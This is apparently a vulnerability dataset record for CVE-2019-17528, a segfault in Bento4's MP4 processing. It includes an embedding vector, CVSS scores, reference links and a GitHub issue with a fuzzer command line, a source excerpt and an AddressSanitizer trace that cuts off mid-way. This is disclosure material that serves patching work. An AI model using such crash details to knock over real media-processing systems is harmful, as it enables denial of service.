0.011614377610385418, -0.014041484333574772, 0.02029537968337536, 0.000717057497240603, -0.021784402430057526, 0.015753861516714096, 0.007854594849050045, -0.025432508438825607, 0.0010888478718698025, 0.014115936122834682, -0.02291605994105339, -0.026936421170830727, -0.013229967094957829, -0.007612628862261772, 0.010579506866633892, 0.030018698424100876, 0.017734261229634285, -0.00004007565075880848, -0.000027104866603622213, -0.01578364148736, 0.00004190784602542408, -0.028142530471086502, 0.0009967145742848516, -0.0054498231038451195, 0.031239697709679604, 0.002004596870392561, -0.0036239090841263533, -0.0013540800428017974, 0.0027639984618872404, 0.006920233368873596, -0.002328459406271577, -0.0007151962490752339, -0.012917272746562958, 0.013981923460960388, -0.0060677677392959595, 0.013416094705462456, 0.0002633708936627954, 0.004459623247385025, 0.020533623173832893, -0.00010882662172662094, -0.009276611730456352, 0.0030562193132936954, -0.0007165921851992607, -0.024509314447641373, 0.009217050857841969, -0.004809543490409851, 0.010170025750994682, 0.03394971787929535, 0.0022279503755271435, 0.0067266603000462055, 0.02050384320318699, -0.00973820872604847, -0.026847081258893013, 0.007385552860796452, -0.0033744978718459606, -0.01193451788276434, 0.03219267353415489, 0.001893850858323276, 0.001980400178581476, -0.0026020673103630543, 0.015694299712777138, -0.02264803647994995, 0.013624558225274086, 0.0025331999640911818, 0.004850491415709257, -0.003919852431863546, -0.011301682330667973, -0.001720751984976232, 0.037136226892471313, -0.002192585961893201, -0.01028914749622345, 0.00391240743920207, 0.00823429599404335, -0.016111226752400398, 0.001735642203129828, -0.014458411373198032, -0.01450308132916689, -0.005669454112648964, -0.0032814338337630033, 0.0003569001564756036, -0.025700533762574196, 0.0006686642882414162, 0.014659428969025612, -0.0085767712444067, 0.01334164384752512, -0.03960800543427467, -0.01701953075826168, -0.00998389720916748, 0.005181799177080393, 0.019669990986585617, -0.002441997407004237, 0.008122619241476059, 0.004638305865228176, -0.015180586837232113, -0.00864377710968256, 0.007203147746622562, -0.03624281287193298, 0.011480365879833698, -0.005356759298592806, -0.010609286837279797, -0.001739364699460566, 0.009820105507969856, 0.024613546207547188, -0.007564235478639603, 0.011487810872495174, 0.024956021457910538, -0.019431747496128082, -0.012671583332121372, -0.016021884977817535, -0.02456887625157833, 0.012939607724547386, -0.026221690699458122, -0.009976452216506004, -0.009998788125813007, -0.0006812278879806399, -0.006577758118510246, 0.0005686205695383251, -0.017049310728907585, -0.012597132474184036, -0.011257012374699116, 0.005159463733434677, -0.026579055935144424, -0.02806807868182659, 0.035706765949726105, 0.003635076805949211, -0.013006613589823246, 0.013110845349729061, 0.024375302717089653, 0.013572442345321178, -0.020548515021800995, 0.017957614734768867, 0.004333056043833494, -0.014525417238473892, -0.015225257724523544, 0.0062799532897770405, 0.008189625106751919, -0.012671583332121372, 0.00046299301902763546, 0.03183530643582344, -0.008465094491839409, 0.010787969455122948, -0.01128679234534502, -0.020771866664290428, -0.008122619241476059, 0.0035755159333348274, 0.007605183869600296, 0.01427228283137083, -0.025372948497533798, 0.007981161586940289, -0.009566971100866795, -0.017719371244311333, 0.0010311482474207878, -0.01234399899840355, 0.004359113983809948, -0.003156728344038129, -0.010274257510900497, -0.00045996843255124986, 0.032133109867572784, -0.0018761686515063047, -0.00432188855484128, 0.003305630525574088, -0.02346699871122837, -0.02188863418996334, 0.023169193416833878, 0.011130444705486298, 0.004828156437724829, -0.008829904720187187, -0.018076736479997635, -0.0033949718344956636, -0.0020771867129951715, 0.01681106723845005, 0.01804695650935173, 0.0004830017569474876, 0.0010581368114799261, -0.014845556579530239, -0.0037393083330243826, -0.007236650679260492, 0.0418415404856205, 0.02648971416056156, -0.0015429998748004436, 0.008733118884265423, 0.0018519720761105418, -0.001969232689589262, -0.001675150590017438, 0.007374385371804237, -0.004213934298604727, -0.00033014427754096687, 0.023988157510757446, 0.001505774213001132, 0.03341367095708847, -0.009544636122882366, 0.0005690858815796673, -0.018746796995401382, 0.014294618740677834, 0.006324624177068472, 0.00425488268956542, 0.0013726928737014532, 0.008003497496247292, 0.014838111586868763, -0.0048914398066699505, -0.016081444919109344, -0.01471154484897852, -0.01597721502184868, 0.014927453361451626, 0.032133109867572784, 0.014242502860724926, -0.004735092166811228, -0.003651828272268176, 0.012373778969049454, -0.005092457868158817, 0.016036774963140488, -0.0073446049354970455, -0.027055542916059494, -0.000413203815696761, 0.0025760093703866005, 0.001571849687024951, 0.02173973247408867, 0.024881569668650627, -0.02812764048576355, 0.014354179613292217, -0.007512119598686695, -0.007467449177056551, -0.020965440198779106, -0.0037411695811897516, -0.01461475808173418, -0.00782481487840414, 0.002473639091476798, -0.017332224175333977, -0.012976833619177341, -0.027412908151745796, 0.01544116623699665, 0.0028626462444663048, 0.010244476608932018, -0.0010376627324149013, 0.022320451214909554, 0.009172379970550537, -0.005639673676341772, 0.0023880202788859606, -0.030614307150244713, -0.018836138769984245, -0.008636332117021084, -0.00497333612293005, 0.016304798424243927, -0.03472401201725006, -0.006354404613375664, -0.01914883218705654, 0.004772318061441183, -0.006838337052613497, -0.010773079469799995, -0.004478235729038715, -0.03409862145781517, -0.019387075677514076, 0.008517210371792316, -0.007620073854923248, -0.00912026409059763, -0.0030748320277780294, 0.01244822982698679, -0.002663489431142807, -0.009105374105274677, -0.0015532368561252952, -0.005140851251780987, -0.010512501001358032, -0.018836138769984245, -0.00562478369101882, -0.01218020636588335, -0.02016136795282364, -0.02016136795282364, -0.010840085335075855, -0.007050522603094578, -0.014465856365859509, 0.0009818243561312556, 0.013981923460960388, 0.007113806437700987, -0.01313318032771349, -0.0016863183118402958, -0.015813421458005905, 0.011480365879833698, -0.019714660942554474, 0.024732667952775955, 0.005464713554829359, -0.0024643326178193092, -0.00009521602623863146, -0.012537571601569653, -0.02614723891019821, -0.01673661544919014, -0.01818096823990345, -0.025551630184054375, -0.01687062717974186, -0.031061014160513878, -0.01416060607880354, 0.005877917166799307, 0.042705174535512924, 0.0016518846387043595, 0.001441560103558004, 0.006693157367408276, 0.010452940128743649, -0.019461527466773987, -0.01626012846827507, 0.02063785493373871, -0.008226851001381874, -0.012894936837255955, 0.011465474963188171, -0.02367546223104, -0.003011548426002264, 0.007996052503585815, 0.00249597430229187, 0.005330701358616352, -0.018538333475589752, -0.01605166494846344, -0.0016416475409641862, -0.004031529184430838, -0.036183252930641174, 0.003175341058522463, -0.004563854541629553, 0.02578987367451191, 0.007460004184395075, -0.009403178468346596, 0.002834727056324482, 0.0070691355504095554, 0.00957441609352827, -0.0002680241013877094, 0.020771866664290428, 0.014488191343843937, 0.023749912157654762, 0.0015476529952138662, -0.012492900714278221, -0.03266916051506996, 0.024985801428556442, -0.019655101001262665, -0.003134392900392413, -0.004969613626599312, -0.003931019920855761, 0.009179824963212013, 0.004746260121464729, -0.009909446351230145, 0.026638617739081383, -0.002983629470691085, -0.038178544491529465, -0.01069862861186266, -0.0030357451178133488, 0.0243604127317667, 0.0011111831991001964, 0.004575022496283054, -0.00391240743920207, 0.0020790479611605406, -0.006521919742226601, -0.0048914398066699505, -0.0024252457078546286, 0.017644919455051422, -0.006049154791980982, -0.009187270887196064, -0.02010180801153183, -0.01502423919737339, 0.034068841487169266, 0.010594396851956844, 0.004690421745181084, -0.0035922673996537924, -0.016766395419836044, -0.0018156771548092365, 0.015158251859247684, -0.01022214163094759, -0.01947641745209694, 0.013430985622107983, -0.009775434620678425, -0.01652815192937851, 0.0009287779685109854, 0.019387075677514076, -0.00011981980060227215, 0.010452940128743649, -0.002190724713727832, 0.005781130865216255, 0.004578744992613792, 0.022335341200232506, 0.023779693990945816, -0.011458029970526695, 0.006190611980855465, 0.005803466308861971, -0.015515617094933987, -0.007203147746622562, -0.009827550500631332, 0.008740563876926899, 0.03335411101579666, -0.00032688703504391015, -0.007113806437700987, -0.010557170957326889, -0.0030878609977662563, 0.0053158113732934, 0.026579055935144424, -0.01165904849767685, -0.005222747568041086, -0.018300089985132217, 0.016915298998355865, -0.0056806220673024654, -0.010184915736317635, 0.0024326909333467484, -0.003614602843299508, -0.00782481487840414, -0.021635500714182854, 0.01340864971280098, -0.021650390699505806, -0.020876098424196243, -0.014882782474160194, 0.0022819272708147764, -0.026802409440279007, 0.0032144279684871435, -0.010415714234113693, 0.015947433188557625, -0.005137128755450249, -0.012679029256105423, -0.015500727109611034, -0.005386539734899998, -0.012366333976387978, 0.022528914734721184, -0.027472469955682755, -0.0009017894044518471, -0.01831497997045517, 0.008375752717256546, 0.013363978825509548, 0.007314824499189854, 0.003115780185908079, 0.0015932543901726604, -0.026921531185507774, -0.010088128969073296, 0.010892201215028763, 0.002330320654436946, -0.0014145716559141874, 0.012329108081758022, -0.009388288483023643, -0.011279347352683544, 0.018493663519620895, -0.0006328346789814532, -0.03922085836529732, -0.013490546494722366, 0.001073027029633522, -0.030435625463724136, 0.014197831973433495, -0.00016193122428376228, -0.0021870022173970938, -0.008278966881334782, -0.011413359083235264, -0.013639448210597038, -0.01576875150203705, 0.03829766437411308, 0.005289753433316946, -0.0024643326178193092, 0.003367052646353841, 0.004604802932590246, 0.006525642238557339, -0.005621060729026794, -0.016036774963140488, -0.00768335722386837, 0.01495723333209753, -0.020533623173832893, -0.000014286766599980183, -0.016364360228180885, 0.0008920176769606769, -0.016900409013032913, 0.01599210500717163, 0.024271070957183838, 0.0312099177390337, 0.0070319101214408875, 0.0042772176675498486, -0.025879215449094772, -0.004377726931124926, 0.0019450359977781773, -0.0048951623030006886, 0.0178384929895401, -0.01584320142865181, 0.007441391237080097, -0.016245238482952118, 0.005755072925239801, -0.011882402002811432, 0.005516829434782267, 0.022007755935192108, 0.0023824365343898535, -0.003445226466283202, -0.016617493703961372, 0.0075195650570094585, 0.010475275106728077, -0.02086120843887329, 0.012157870456576347, -0.010162580758333206, 0.028693469241261482, 0.010594396851956844, 0.001477855141274631, -0.006209224928170443, 0.012157870456576347, -0.004906329791992903, -0.018166078254580498, 0.00036201864713802934, -0.0012805595761165023, 0.006186889484524727, 0.00012133208656450734, -0.0005393054452724755, -0.010505056008696556, 0.009172379970550537, 0.0013633865164592862, 0.007787588983774185, 0.009656312875449657, -0.0021683895029127598, 0.021025002002716064, -0.015902763232588768, -0.007452558726072311, -0.0024140782188624144, -0.0014899533707648516, -0.010579506866633892, 0.0004604337445925921, -0.01757046766579151, -0.004113425500690937, -0.0049286652356386185, -0.006183166988193989, -0.0072478181682527065, 0.029393309727311134, 0.02833610400557518, 0.008822459727525711, -0.019848672673106194, -0.0050663999281823635, 0.014041484333574772, 0.008733118884265423, -0.014704099856317043, 0.016587713733315468, 0.016766395419836044, -0.0004299553111195564, -0.009626531973481178, 0.0008506042649969459, 0.0025778706185519695, -0.006209224928170443, -0.025194264948368073, 0.006808556616306305, 0.016170786693692207, 0.0023936040233820677, 0.0034191685263067484, 0.006540532689541578, 0.01880635693669319, -0.0024364134296774864, 0.006767608225345612, -0.005729014985263348, -0.025343166664242744, 0.0014480745885521173, 0.023064961656928062, -0.0012284438125789165, -0.00885224062949419, -0.025804763659834862, 0.009514855220913887, 0.008546990342438221, -0.003852846333757043, 0.007314824499189854, -0.008800124749541283, -0.009313837625086308, 0.009313837625086308, 0.0004778832371812314, -0.007705692667514086, -0.0020306548103690147, 0.006443745922297239, -0.018538333475589752, 0.018136296421289444, 0.009931782260537148, -0.004943555686622858, 0.011979187838733196, 0.0036220478359609842, 0.004988226108253002, 0.002801224123686552, -0.015738969668745995, -0.005982148926705122, 0.018880808725953102, 0.016111226752400398, 0.0022484243381768465, -0.02221621945500374, -0.008971362374722958, -0.00281239184550941, 0.004820710979402065, -0.011830286122858524, 0.007597738411277533, 0.007407888304442167, 0.007195702288299799, 0.041335273534059525, 0.004828156437724829, 0.0060677677392959595, -0.026445044204592705, 0.02456887625157833, 0.0029017331544309855, -0.01190473698079586, -0.008748008869588375, -0.018061846494674683, -0.003158589592203498, 0.013594778254628181, 0.007017019670456648, -0.020116697996854782, 0.014555197209119797, -0.001829636748880148, 0.000984616344794631, 0.007943936623632908, -0.0035289840307086706, 0.008010942488908768, -0.0027584147173911333, 0.018538333475589752, 0.013885137625038624, -0.02031026966869831, -0.015411385335028172, -0.00670432485640049, 0.007523287553340197, -0.001848249463364482, 0.00006747134466422722, -0.019089272245764732, 0.012492900714278221, 0.009857330471277237, 0.021799292415380478, -0.018612785264849663, 0.0016574684996157885, 0.03356257453560829, -0.03189486637711525, -0.009499965235590935, -0.01626012846827507, 0.002670934656634927, 0.00987966638058424, -0.0017291277181357145, 0.020950550213456154, -0.014153161086142063, 0.021992865949869156, 0.004835601430386305, 0.0008566533797420561, 0.0034303362481296062, 0.0000262469347944716, 0.012187651358544827, -0.005286030936986208, -0.020608074963092804, 0.0017421566881239414, 0.004351668991148472, -0.010542280972003937, 0.009179824963212013, -0.007486062124371529, 0.024926241487264633, 0.006358127109706402, 0.016647273674607277, -0.0198933444917202, -0.024047717452049255, -0.007005852181464434, -0.032133109867572784, -0.01014768984168768, 0.006428855936974287, 0.011807950213551521, 0.011480365879833698, 0.002036238554865122, -0.016483481973409653, 0.0034135847818106413, 0.009581861086189747, 0.013118290342390537, -0.0016044219955801964, -0.013766015879809856, -0.008949026465415955, -0.0061049931682646275, 0.0152624836191535, 0.011666493490338326, 0.022930949926376343, 0.01482322160154581, -0.028485005721449852, -0.01464453898370266, -0.04088856652379036, 0.0034526714589446783, 0.011733499355614185, 0.004225102253258228, -0.007623796351253986, -0.0009385496377944946, -0.03671929985284805, 0.013028949499130249, 0.011919626966118813, -0.007136141415685415, -0.0026579056866467, 0.01492000836879015, 0.0007752224919386208, -0.016721725463867188, 0.008941581472754478, 0.013810685835778713, 0.026787519454956055, 0.002648599212989211, -0.023303207010030746, 0.006224114913493395, 0.008695892989635468, 0.009246831759810448, 0.012880046851933002, -0.014994459226727486, 0.024777337908744812, 0.00363693805411458, -0.003126947907730937, -0.0034154460299760103, -0.023139413446187973, -0.02921462617814541, 0.0011530619813129306, -0.005621060729026794, 0.00895647145807743, -0.0036704412195831537, -0.0185234434902668, 0.019938014447689056, 0.007158476859331131, 0.009902001358568668, -0.00401291623711586, 0.005330701358616352, -0.006767608225345612, -0.0009548358502797782, -0.002008319366723299, -0.002641154220327735, 0.02182907424867153, -0.016691945493221283, -0.013736234977841377, -0.0019115329487249255, -0.0030134099069982767, 0.02964644320309162, 0.00033456480014137924, 0.002613235032185912, -0.013177851215004921, -0.025640971958637238, -0.040233395993709564, -0.0027639984618872404, 0.012321663089096546, -0.03314564749598503, 0.0020511287730187178, -0.0077652535401284695, 0.001744948560371995, -0.00345639418810606, -0.007333436980843544, 0.0012228599516674876, 0.00363693805411458, 0.011115554720163345, -0.015530507080256939, 0.008010942488908768, -0.008293856866657734, 0.0233180969953537, 0.003815620904788375, -0.013423540629446507, 0.0016872489359229803, 0.007236650679260492, -0.008502320386469364, -0.011800505220890045, -0.006365572102367878, -0.02552185021340847, 0.014912563376128674, -0.03931020200252533, 0.006663376931101084, -0.0065107522532343864, 0.018746796995401382, 0.014346734620630741, 0.013870246708393097, 0.019878454506397247, 0.010512501001358032, -0.010393379256129265, -0.00782481487840414, 0.009179824963212013, 0.016006994992494583, 0.001980400178581476, -0.0038789042737334967, -0.0003373567305970937, -0.015902763232588768, 0.012306773103773594, 0.01755557768046856, 0.003162312088534236, 0.02894660271704197, -0.011055993847548962, 0.006250172853469849, -0.0004592704644892365, -0.002823559334501624, 0.008561881259083748, -0.0035773771815001965, 0.014443520456552505, 0.0032684048637747765, 0.015887873247265816, 0.02441997267305851, 0.00830130185931921, -0.00905325822532177, 0.012463120743632317, 0.009700982831418514, 0.012217431329190731, 0.00895647145807743, -0.0008431591559201479, 0.009164934977889061, 0.012753480114042759, 0.013952143490314484, -0.0032590986229479313, 0.02818720042705536, 0.0037653662730008364, -0.011666493490338326, 0.018404321745038033, -0.01892547868192196, -0.008666112087666988, 0.01687062717974186, -0.020697416737675667, 0.004776040557771921, 0.009790324606001377, 0.006313456688076258, 0.00923194084316492, -0.009700982831418514, 0.005192966666072607, 0.004872826859354973, 0.0012144842185080051, -0.039816468954086304, -0.017198212444782257, -0.014927453361451626, 0.0065889256075024605, -0.00663731899112463, -0.002287511248141527, -0.007404165808111429, -0.011190006509423256, -0.000914818374440074, 0.004493126180022955, 0.007899265736341476, -0.005271140486001968, 0.016915298998355865, 0.015031685121357441, 0.01334164384752512, 0.020890990272164345, 0.022722488269209862, -0.027070432901382446, 0.022796938195824623, -0.0020548515021800995, 0.024330632761120796, -0.02044428326189518, -0.028142530471086502, -0.000990200089290738, 0.004474513232707977, -0.01597721502184868, -0.008278966881334782, -0.0034489489626139402, -0.02607278898358345, 0.00725526362657547, 0.010959207080304623, 0.0061049931682646275, -0.0016295493114739656, 0.0000041151702134811785, -0.028827480971813202, 0.005851859226822853, 0.005848136730492115, 0.004243714734911919, -0.00002940238300652709, 0.0035680707078427076, -0.0037002216558903456, 0.011063438840210438, 0.01094431709498167, 0.013162961229681969, 0.0007845288491807878, 0.01913394220173359, 0.0020641577430069447, -0.001982261659577489, -0.010050904005765915, -0.017302444204688072, -0.009611641988158226, 0.02284161001443863, 0.00850976537913084, 0.010780524462461472, -0.019178614020347595, 0.002963155275210738, -0.006842059548944235, 0.00782481487840414, -0.009864775463938713, -0.01306617446243763, 0.009112819097936153, -0.01097409799695015, -0.005289753433316946, 0.007534455042332411, 0.0009366883896291256, -0.0009725179988890886, -0.0031865087803453207, -0.012470565736293793, 0.015150806866586208, -0.00028175103943794966, 0.008591661229729652, -0.0012237905757501721, 0.020265599712729454, 0.013788350857794285, 0.021159013733267784, -0.012306773103773594, -0.010661402717232704, 0.017659809440374374, -0.006410242989659309, 0.0027788886800408363, -0.024390192702412605, -0.010132799856364727, 0.01244822982698679, 0.018210748210549355, 0.010847531259059906, 0.03240113705396652, -0.0036127413623034954, -0.00782481487840414, -0.002516448497772217, 0.019193504005670547, -0.006287398748099804, 0.007467449177056551, 0.01612611673772335, 0.005390262231230736, -0.005877917166799307, 0.009775434620678425, -0.01576875150203705, -0.013505436480045319, 0.013847911730408669, 0.023586120456457138, 0.007154754363000393, 0.019044600427150726, 0.023779693990945816, 0.007921600714325905, 0.011458029970526695, 0.0030450515914708376, -0.006425133440643549, -0.000999506562948227, 0.004001748748123646, 0.020608074963092804, 0.017198212444782257, 0.01022214163094759, -0.018568113446235657, -0.010274257510900497, 0.0001784500782378018, 0.001152131357230246, -0.0005411666934378445, 0.013282082974910736, 0.006302288733422756, -0.0052041346207261086, 0.013996814377605915, 0.0010143967811018229, 0.0192083939909935, -0.0012116922298446298, -0.004705311730504036, -0.0015160113107413054, -0.026861971244215965, 0.013043839484453201, 0.025879215449094772, -0.016066554933786392, -0.007493507117033005, -0.004980781115591526, -0.001426669885404408, 0.0032181504648178816, -0.022930949926376343, 0.03073342889547348, 0.007705692667514086, -0.002799362875521183, -0.0009017894044518471, -0.012403559871017933, 0.006641041487455368, 0.018776576966047287, -0.0035308452788740396, -0.007608906365931034, 0.020742086693644524, 0.0377318374812603, -0.022722488269209862, 0.005606170743703842, 0.00795882660895586, -0.028246762230992317, -0.02050384320318699, 0.02386903576552868, 0.005673176608979702, -0.006164554040879011, -0.017615139484405518, -0.00026965272263623774, -0.009559526108205318, 0.010981542989611626, 0.00010981543164234608, 0.003826788393780589, -0.015515617094933987, -0.026534385979175568, -0.012403559871017933, -0.012120645493268967, -0.022037537768483162, 0.02029537968337536, -0.00598587142303586, 0.01014768984168768, -0.025343166664242744, -0.002979906741529703, -0.005874194670468569, 0.00560989324003458, 0.022633146494627, -0.006547977682203054, 0.0012973110424354672, 0.00533442385494709, -0.023422328755259514, 0.006983516737818718, 0.008249185979366302, 0.022826718166470528, 0.004470790736377239, 0.01934240572154522, -0.005628506187349558, -0.007456281688064337, -0.01299916859716177, -0.004377726931124926, 0.006041709799319506, 0.0050254520028829575, 0.02989957667887211, -0.006521919742226601, 0.00281239184550941, -0.006119883619248867, -0.0037802564911544323, 0.01324485708028078, -0.007921600714325905, -0.005393984727561474, 0.010036013089120388, -0.0026876861229538918, 0.0050291744992136955, -0.01660260371863842, -0.0035829609259963036, -0.024985801428556442, 0.009708428755402565, 0.00299293571151793, -0.018136296421289444, 0.0015523062320426106, -0.008018387481570244, 0.0013187157455831766, -0.0017970643239095807, 0.0028403110336512327, 0.020474063232541084, 0.012329108081758022, 0.010088128969073296, -0.004329333547502756, -0.02243957296013832, 0.014071265235543251, -0.007009574677795172, -0.0009687954443506896, -0.021665280684828758, 0.003960800357162952, -0.03278828039765358, -0.00012307704309932888, 0.0006523780757561326, -0.0152624836191535, -0.010400824248790741, -0.012619467452168465, 0.00724037317559123, 0.003666718490421772, 0.02029537968337536, -0.004016638733446598, 0.006052877753973007, 0.0006184097728691995, -0.02257358469069004, 0.010050904005765915, 0.024300850927829742, 0.021501488983631134, 0.015113580971956253, -0.00078685546759516, 0.006160831544548273, -0.01831497997045517, -0.007229205686599016, 0.00108047213871032, 0.004184153862297535, -0.009522300213575363, 0.004694144241511822, -0.02023581974208355, -0.0023936040233820677, 0.017719371244311333, 0.014808331616222858, 0.006480971351265907, 0.014867892488837242, 0.01395958848297596, 0.0012759063392877579, 0.004727647174149752, 0.013423540629446507, 0.007471171673387289, -0.003117641434073448, -0.023035181686282158, 0.023228755220770836, 0.006767608225345612, -0.02264803647994995, -0.013989368453621864, 0.05595747381448746, 0.00012191374116810039, 0.01666216552257538, 0.01626012846827507, -0.002970600500702858, 0.01081030536442995, -0.015500727109611034, -0.016036774963140488, 0.002140470314770937, -0.005219024606049061, 0.005438655614852905, 0.0024289684370160103, 0.01238122396171093, -0.01935729570686817, -0.00265046046115458, 0.0028607849963009357, -0.006239005364477634, -0.0032237342093139887, -0.0018594171851873398, -0.01688551902770996, -0.018300089985132217, -0.004146928433328867, 0.02648971416056156, -0.011510145850479603, -0.004392616916447878, -0.002268898533657193, -0.0018640704220160842, 0.003852846333757043, -0.002350794617086649, -0.017600249499082565, 0.04383682832121849, -0.006741550751030445, -0.002380575053393841, 0.0018910588696599007, -0.0018836137605831027, 0.008241740986704826, 0.002693269867449999, 0.01560495886951685, 0.003540151519700885, 0.006145941559225321, -0.0005867680301889777, -0.00029524529236368835, -0.008219406008720398, -0.004776040557771921, -0.003785840468481183, 0.006518197245895863, 0.0025425064377486706, -0.017436455935239792, -0.005044064484536648, 0.01443607546389103, 0.007653576787561178, 0.008219406008720398, -0.01234399899840355, 0.009410623461008072, 0.005729014985263348, 0.00495844567194581, 0.0030562193132936954, -0.021977975964546204, 0.0055838353000581264, -0.015813421458005905, 0.0002271923003718257, -0.01056461688131094, -0.010393379256129265, -0.0111527806147933, -0.025745203718543053, -0.00035178163670934737, 0.002330320654436946, 0.008204515092074871, -0.009477630257606506, 0.012679029256105423, -0.01770448125898838, -0.006492139305919409, -0.01104110386222601, -0.010043458081781864, -0.004266050178557634, -0.015560287982225418, 0.01844899170100689, -0.009656312875449657, 0.02208220772445202, 0.00730737904086709, 0.006905342917889357, -0.013118290342390537, 0.009432959370315075, -0.002784472657367587, 0.0025406451895833015, -0.008941581472754478, -0.010691183619201183, -0.0036034351214766502, -0.02717466466128826, 0.01427228283137083, 0.01585809327661991, 0.02236512117087841, -0.033800818026065826, -0.011867511086165905, 0.009820105507969856, -0.0030469128396362066, 0.021367477253079414, -0.011979187838733196, -0.003696498926728964, 0.009388288483023643, 0.013051284477114677, -0.0006449329666793346, -0.03246069699525833, -0.002052990021184087, 0.012142980471253395, -0.006585203111171722, 0.005796021316200495, -0.0023973267525434494, -0.0034247522708028555, 0.011785615235567093, 0.006186889484524727, -0.0034377812407910824, -0.019982686266303062, 0.00673782778903842, 0.022618256509304047, 0.002192585961893201, -0.0030264388769865036, 0.013654339127242565, 0.022811828181147575, 0.008524655364453793, -0.0012005246244370937, 0.0015671964501962066, 0.016379250213503838, 0.025000691413879395, 0.008249185979366302, -0.0005355828907340765, -0.008561881259083748, 0.017540687695145607, 0.005457268562167883, -0.002023209584876895, 0.007973716594278812, -0.014383959583938122, 0.021516378968954086, -0.01899993047118187, -0.010787969455122948, 0.011264457367360592, -0.001336397952400148, 0.024032827466726303, 0.01935729570686817, 0.00533442385494709, 0.009284056723117828, 0.031120575964450836, -0.005568945314735174, 0.002492251805961132, -0.02456887625157833, 0.014130826108157635, 0.0023731300607323647, 0.011257012374699116, -0.014570088125765324, -0.012917272746562958, 0.009723318740725517, 0.010460385121405125, 0.01810651645064354, 0.014108490198850632, -0.016706835478544235, 0.005308365914970636, 0.005632228683680296, 0.011257012374699116, -0.005881640128791332, -0.0014676180435344577, 0.004206489305943251, 0.0022130601573735476, 0.0056843445636332035, 0.019997576251626015, 0.012783260084688663, -0.008033277466893196, 0.003460116684436798, -0.0035922673996537924, 0.0150986909866333, -0.010199805721640587, -0.012336554005742073, -0.009797769598662853, -0.011472919955849648, -0.010095573961734772, 0.009552081115543842, 0.0012089003575965762, 0.011190006509423256, -0.008308746851980686, -0.0027398017700761557, 0.016215458512306213, 0.00002980953831865918, 0.009842440485954285, -0.017391785979270935, 0.016706835478544235, 0.03436664491891861, -0.001509496825747192, 0.00032060520607046783, -0.0018724461551755667, 0.013713899999856949, -0.0006742480909451842, -0.012842820957303047, -0.015247592702507973, 0.0015653352020308375, -0.005561499856412411, -0.010825195349752903, 0.02544739842414856, 0.008666112087666988, 0.00023580071865580976, 0.032907404005527496, -0.02188863418996334, -0.00500683905556798, -0.012813040986657143, -0.008427868597209454, 0.01681106723845005 ]
339
CVE-2019-17528
2019-10-12T20:15:11.487000
An issue was discovered in Bento4 1.5.1.0. There is a SEGV in the function AP4_TfhdAtom::SetDefaultSampleSize at Core/Ap4TfhdAtom.h when called from AP4_Processor::ProcessFragments in Core/Ap4Processor.cpp.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/TeamSeri0us/pocs/tree/master/bento4" }, { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/432" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:axiosys:bento4:1.5.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "83B32974-D913-4DDB-844F-C58D55ECC17E", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/axiomatic-systems/Bento4/issues/432
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "axiomatic-systems", "Bento4" ]
# bento4 ## version bento4 1.5.1.0 ## description ```txt None ``` ## download link None ## others please send email to [email protected] if you have any questions. --------------------- ## AP4_TfhdAtom::[email protected]___SEGV_UNKNOW ### description An issue was discovered in bento4 1.5.1.0, There is a/an SEGV_UNKNOW in function AP4_TfhdAtom::SetDefaultSampleSize at Ap4TfhdAtom.h-80 ### commandline mp4edit @@ a.mp4 ### source ```c 76 void SetSampleDescriptionIndex(AP4_UI32 indx) { m_SampleDescriptionIndex = indx; } 77 AP4_UI32 GetDefaultSampleDuration() { return m_DefaultSampleDuration; } 78 void SetDefaultSampleDuration(AP4_UI32 duration) { m_DefaultSampleDuration = duration; } 79 AP4_UI32 GetDefaultSampleSize() { return m_DefaultSampleSize; } 80 void SetDefaultSampleSize(AP4_UI32 size) { m_DefaultSampleSize = size; } 81 AP4_UI32 GetDefaultSampleFlags() { return m_DefaultSampleFlags; } 82 void SetDefaultSampleFlags(AP4_UI32 flags) { m_DefaultSampleFlags = flags; } 83 84 void UpdateFlags(AP4_UI32 flags); 85 ``` ### bug report ```txt ASAN:SIGSEGV ================================================================= ==16948==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000004 (pc 0x000000498774 bp 0x7ffdcfa6e2e0 sp 0x7ffdcfa6df60 T0) #0 0x498773 in AP4_TfhdAtom::SetDefaultSampleSize(unsigned int) /src/bento4/Source/C++/Core/Ap4TfhdAtom.h:80 #1 0x498773 in AP4_Processor::ProcessFragments(AP4_MoovAtom*, AP4_List<AP4_AtomLocator>&, AP4_ContainerAtom*, AP4_SidxAtom*, unsigned long long, AP4_ByteStream&, AP4_ByteStream&) /src/bento4/Source/C++/Core/Ap4Processor.cpp:331 #2 0x4a68d0 in AP4_Processor::Process(AP4_ByteStream&, AP4_ByteStream&, AP4_ByteStream*, AP4_Processor::ProgressListener*, AP4_AtomFactory&) /src/bento4/Source/C++/Core/Ap4Processor.cpp:711 #3 0x43f413 in main /src/bento4/Source/C++/Apps/Mp4Edit/Mp4Edit.cpp:451 #4 0x7fc7db40082f in __libc_start_main 